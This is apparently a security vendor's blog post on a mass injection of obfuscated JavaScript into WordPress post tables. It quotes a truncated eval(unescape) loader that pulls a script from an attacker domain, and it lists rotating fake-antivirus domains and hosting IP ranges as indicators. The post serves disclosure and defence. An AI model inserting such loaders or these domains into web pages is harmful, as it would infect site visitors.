We posted a few weeks ago about a large scale database injection attack affecting WordPress on shared hosts. The infected sites got the following javascript malware inserted on every post of their database (generally the wp-post table on WordPress):
<script>eval(unescape("%64%6F%63%75%6D%65%6E%74%2E%77%72..
70%3F%6B%6B%3D%33%33%22%3E%3C%2F%73%63%72%69%70%74%3E%27%29%3B"..
Which after decoded, attempted to include and load the following link: lessthenaminutehandle.com/js.php?kk=33
We also saw multiple variations of it, where the following domains where used as the main intermediaries:
http://lessthenaseconddeal.com/ll.php?k=09
globalpoweringgathering.com
lessthenaminutehandle.com
lessthenaseconddeal.com
welcometotheglobalisnet.com
What is interesting is the number of sub-intermediaries that change every few hours:
antivir1.mooo.com
antivirus-3654.co.cc
aqfwbngy.co.cc
defender-dyxa.co.cc
defender-kwwh.in
defender-wqga.in
defender-wtln.co.cc
pfoencut.co.cc
software-wujy.co.cc
system-scanner-ryes.co.cc
system-scanner-uemo.co.cc
system-scanner-uotu.co.cc
zgfozmcr.co.cc
antivirus-microsoft-corporation.com
www3.aboutavsoft.com
www3.first-guardul.cz.cc
www3.first-security-checker.com
www3.incredible-protectionro.rr.nu
www3.netprotectionsoftre.com
www3.powerkbsentinel.rr.nu
www3.powernhgmdftkcleaner.myfw.us
www3.save-internet-foru.com
www3.simpleclean-foru.net
www3.smart-security-holder.in
www3.smartsuite-4u.in
www3.smartsystemscanro.myfw.us
www3.specialprotectionti.rr.nu
www3.strongcheckera.rr.nu
www3.top-network-guard.in
www3.top-scan-foru.in
www3.topsuitesentinel.rr.nu
www4.avguardianpp.myfw.us
www4.avguardianst.myfw.us
www4.bestuhzscanner.rr.nu
www4.first-internetmaster.net
www4.foryou-cleanhard.rr.nu
www4.goodghtsafe.rr.nu
www4.seeeresafe.in
www4.seefredsafe.in
www4.smartinternet-foryou.net
www4.strong-oppinternet.in
www4.thebestcheckernar.myfw.us
www4.top-only-scanner.uni.cc
They are using domains on multiple TLDs (.net, .com, .in, .us, etc) and changing every hour. The most common network for these to be hosted are at: 65.23.153.0/24 and 46.252.130.0/24, but that changes often as well. We will keep you posted as we track them…
If you are worried your site might be vulneable, scan it here: http://sitecheck.sucuri.net
If your site is infected with malware or blacklisted, we are here to help.
